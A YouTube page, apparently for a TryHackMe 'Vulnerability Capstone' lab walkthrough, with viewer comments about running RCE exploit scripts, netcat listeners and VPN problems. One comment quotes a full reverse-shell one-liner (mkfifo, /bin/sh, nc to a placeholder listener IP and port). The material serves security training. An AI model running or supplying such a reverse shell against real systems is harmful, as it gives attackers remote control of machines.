Try Hack Me : Vulnerability Capstone

Ғылым және технология

This is our continuation series of Junior pentesting learning path on tryhackme.com. We are done with vulnerabilities! Lets have some fun!
Patreon to help support the channel! Thank you so much!
/ stuffy24
Hacker Discord
/ discord

Пікірлер: 71

  • @Frenzaahh
    @Frenzaahh Жыл бұрын

    You always have the best explanation when I get stuck!

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you man! I appreciate that!

  • @chief4180
    @chief41804 ай бұрын

    I hate having to go through a walkthrough, I couldn't handle it myself. But thanks for sharing this. I watched 2 more walkthroughs for the same room and this was the only one that helped me. Again, thank you.

  • @stuffy24

    @stuffy24

    4 ай бұрын

    Appreciate it!

  • @SAinTIdiVAca
    @SAinTIdiVAca2 жыл бұрын

    Dude I was sitting here trying to upload a reverse shell from the admin page and was like "Wait wait... I think I'm going out of bounds from where the room wants me to be"

  • @roseywinter
    @roseywinter6 ай бұрын

    Thank you so much for this. I was definitely trying to do too much in my own, and got lost. Lol.

  • @iccanui9053
    @iccanui9053 Жыл бұрын

    thank you so much for walking through this one and teaching a bit. Sometimes its too easy to just paste the answer in when you find it because you want to get the badges or you think you know the basics or whatever. Im really trying to force myself to walk through each step to get it in my brain and improve, so thanks, this helped a lot.

  • @stuffy24

    @stuffy24

    Жыл бұрын

    That's the key!! That's why I try to explain for the few out there actually trying to learn it

  • @CyberAbyss007
    @CyberAbyss0072 ай бұрын

    Thank you! The Python script from searchsploit didn't work out of the box. I appreciate that you showed the alternate script location. That was a huge help.

  • @stuffy24

    @stuffy24

    Ай бұрын

    Glad it helped!

  • @brittislove
    @brittislove Жыл бұрын

    spending my christmas with my boi Stuffy24

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Let's go! Merry Christmas

  • @cryptochristian2056
    @cryptochristian20562 жыл бұрын

    Keep up the good work! I've been just using your videos when needed. However, when I'm all done with the certificate I think I might go back and watch all your videos for a good refresher!

  • @stuffy24

    @stuffy24

    2 жыл бұрын

    Thank you! I appreciate thar

  • @soroushafshar2308
    @soroushafshar2308 Жыл бұрын

    Very good videos. Thank you mate

  • @vacumecleaner
    @vacumecleaner Жыл бұрын

    Subbed. Dude i love your videos and you're perfect for my learning style

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thanks so much! I really appreciate that!

  • @yephonethant126
    @yephonethant1262 жыл бұрын

    your videos are very helpful mate!! kudos to you CHEERS!!!

  • @sekytwo
    @sekytwo Жыл бұрын

    You have the best way of explaining things bro! love your channel man keep it going

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thanks so much!

  • @Alexi-pj4yb
    @Alexi-pj4ybАй бұрын

    Hi Stuffy24 ! lifesaver, you saved me again, I agree with you we shouldn't be manipulating the script. If they wanted us to do it they would've said something. You're by far the best teaching these rooms ! I even watched some rooms in Arabic, Hindi, to try to follow but everybody else does confusing things. Thank you again !

  • @stuffy24

    @stuffy24

    Ай бұрын

    Appreciate the kind words. Thanks so much!

  • @Alexi-pj4yb

    @Alexi-pj4yb

    Ай бұрын

    @@stuffy24 You are helping me get my degree in cybersecurity ! You have a fan ! 😊

  • @stuffy24

    @stuffy24

    Ай бұрын

    @@Alexi-pj4yb well I appreciate the support! Make sure to hop in the discord for daily tips and more access to directly ask questions and things! Thanks again!

  • @ohee83
    @ohee83 Жыл бұрын

    Ended up with your walkthrough after watching several. Keep up the Good Work!

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you so much!

  • @myname-mz3lo
    @myname-mz3lo Жыл бұрын

    thank you for explaining things instead of giving us the awnsers like other people do in writups . it helps me learn much more and so i dont get stuck again . legend

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you for the support

  • @yejiz_nuts
    @yejiz_nuts Жыл бұрын

    This was a great walkthrough! I watched someone else's video before and it was so confusing but you explained it well

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you!

  • @Startrakk989
    @Startrakk9898 ай бұрын

    Excellent video. I like that you explain the python version as that was one of the issues I encountered editing the code.I didn't want to make excuses on this room even though I found it quite difficult. That being said you read my mind in regards to the room not being good. 👍

  • @stuffy24

    @stuffy24

    8 ай бұрын

    Thank you!

  • @Lb2026comeup
    @Lb2026comeup Жыл бұрын

    great content and explanations! 💯💯💯

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thanks so much!

  • @brydiginte6552
    @brydiginte6552 Жыл бұрын

    I realized I was gonna have to edit the code but like damn im glad I just looked it up so messy lol

  • @danmiller7709
    @danmiller77092 жыл бұрын

    I started with two different exploit py files, and both worked but one needed the OpenBSD reverse shell payload , and I'm mostly annoyed because I don't know exactly why. That exploit they provided ended up being much cleaner anyways. Thanks again!

  • @brydiginte6552
    @brydiginte6552 Жыл бұрын

    Really appreciate the video!

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you so much!

  • @rutgalindo9938
    @rutgalindo9938 Жыл бұрын

    I was actuallly editing the code. Thank you for this video it was very helpful.

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Really glad it helped

  • @wolfyyybandz
    @wolfyyybandz6 ай бұрын

    Really weird I had to set my listener to port 8082 for some reason 8081 would not work. It kept throwing an air but after 10 minutes of trying the same thing I decided to change something and guess what it worked.😂😂 thank you again this is making a lot more sense with these walkthroughs.

  • @stuffy24

    @stuffy24

    4 ай бұрын

    Appreciate it. That is weird lol

  • @henr2000
    @henr2000 Жыл бұрын

    you are amazing dude!!!

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Thank you! Appreciate the support man!

  • @dreamysleepyzzz
    @dreamysleepyzzz Жыл бұрын

    Thank you for your explanation, i tried 3 of the RCE exploit, and tried to change what the cmd told me where there was error, i ran it with python3 as i didnt know there was a thing call python2 and related stuffs. Thanks so much, this makes me wonder what is python2 and will further look into it soon ;D

  • @stuffy24

    @stuffy24

    Жыл бұрын

    They are just different versions of python. Different releases! Thank you

  • @unmuktyatree8200
    @unmuktyatree82005 ай бұрын

    you are a champ...i loved when you said "super easy"

  • @stuffy24

    @stuffy24

    5 ай бұрын

    Appreciate it! Not sure if you mean that sarcastically?

  • @unmuktyatree8200

    @unmuktyatree8200

    5 ай бұрын

    @@stuffy24 Not at all x2

  • @wolfyyybandz
    @wolfyyybandz6 ай бұрын

    Wow 300 to 11k subs in a year cudos brother!

  • @stuffy24

    @stuffy24

    6 ай бұрын

    Thanks my man !

  • @vinafl8064

    @vinafl8064

    6 ай бұрын

    @@stuffy24 congrats bro, great explanation, tnx for that

  • @JayJay-hb5ig
    @JayJay-hb5ig11 ай бұрын

    I looked up a guide because I knew as soon as I started getting errors in the python code I downloaded from git that there was a problem. After fixing and reading a couple of errors I thought "Ain't no way they expected someone off the street to just be able to edit python code like this." I should have read the hint.

  • @user-xk6lb2eu9c
    @user-xk6lb2eu9c8 ай бұрын

    HEY! How are you?! I Love your videos and how you explain things! Just wanted to ask a small question....I tried this got everything like you did, ran my netcat, however it didnt open a listener for some reason, I tried with sudo, changing ports, ran it a few times and I wasnt able to get a connection.... I checked the syntax, checked that I put in the right IP and everything.....I pinged it, it was working....So Im not so sure what Im doing wrong =].

  • @stuffy24

    @stuffy24

    8 ай бұрын

    Please join the discord and throw your questions with screenshots under the questions channel

  • @ds-hc8qy
    @ds-hc8qy5 ай бұрын

    Sad to see this box still sucks.. it needs to be updated since it seems way out of scope for the Jr path

  • @DIGITALEMPRESS
    @DIGITALEMPRESS2 жыл бұрын

    That script keeps sending back “No result” for me.

  • @stuffy24

    @stuffy24

    2 жыл бұрын

    You will have to join the discord or Patreon so you can send screenshots and the exact process. It's almost impossible to tell you what's wrong with no context. Our community and myself will try to help for sure though!

  • @teresarothaar6225

    @teresarothaar6225

    2 жыл бұрын

    Me too.

  • @stuffy24

    @stuffy24

    2 жыл бұрын

    @@teresarothaar6225 if you wanna throw as much info in the discord as possible it makes it much easier to help with what's going on

  • @teresarothaar6225

    @teresarothaar6225

    2 жыл бұрын

    @@stuffy24 Done! It turned out that the problem was with me. Instead of giving the shell_me command the AttackBox IP, I was giving it the vulnerable machine's IP. DOH!

  • @stuffy24

    @stuffy24

    2 жыл бұрын

    @@teresarothaar6225 great catch!

  • @cybermom3330
    @cybermom3330 Жыл бұрын

    Is anyone else expericing no results with the listener? I have tried this multiple times. Any suggesgtions? any help is gratly appreciated.

  • @stuffy24

    @stuffy24

    Жыл бұрын

    Are you connected to the VPN? That's the most common thing I see

  • @cybermom3330

    @cybermom3330

    Жыл бұрын

    @@stuffy24 I was using the wrong VPN.. Thank you

  • @PatrikLeng58
    @PatrikLeng58Ай бұрын

    what a stupid room. Ty for guide tho

  • @stuffy24

    @stuffy24

    Ай бұрын

    Not sure I agree but thank you for the kind words

  • @discreteloner9573
    @discreteloner9573 Жыл бұрын

    I used the exploit I downloaded from exploit-db and got stuck at system: …. . No matter what I entered that, everything got stuck. As a newbie with little experience, watching several ways to hack this box seems overly complicated. I will use as you and THM suggested, the exploit in the attack box.

  • @stuffy24

    @stuffy24

    Жыл бұрын

    I understand feeling overwhelmed but keep at it!

  • @pranjalruhela1103
    @pranjalruhela110311 ай бұрын

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc listenerIP listenerPort >/tmp/f They put this in the cmd: shell...and I don't get this whole thing...

  • @stuffy24

    @stuffy24

    11 ай бұрын

    Hop in the discord and feel free to throw your questions in. We can cover them in detail and the Livestreams tonight so we can discuss

Келесі